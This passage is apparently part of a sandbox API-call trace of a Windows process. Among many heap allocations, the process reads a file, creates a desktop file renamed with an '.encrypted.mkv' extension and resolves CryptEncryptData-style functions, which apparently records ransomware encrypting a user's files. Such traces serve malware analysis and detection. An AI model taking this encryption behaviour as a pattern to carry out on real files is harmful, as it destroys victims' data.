dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.334] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.334] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.334] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0030.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0030.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0030.336] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0030.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0030.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0030.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.336] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pRtMXaA65Jvr0xt.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\prtmxaa65jvr0xt.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0030.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.337] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0030.337] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.337] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0030.337] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.338] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.338] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.338] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0030.339] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x40b1, lpOverlapped=0x0) returned 1 [0030.340] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.340] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x140b1) returned 0x8affc0 [0030.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0030.341] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x140b1) returned 0x8c4080 [0030.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0030.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.343] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.343] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x140b1) returned 0x8affc0 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.345] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.345] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.345] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x140b1) returned 0x8affc0 [0030.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0030.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0030.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0030.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x140b1) returned 0x8d8140 [0030.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0030.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.348] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.348] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.348] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2b8 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.349] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 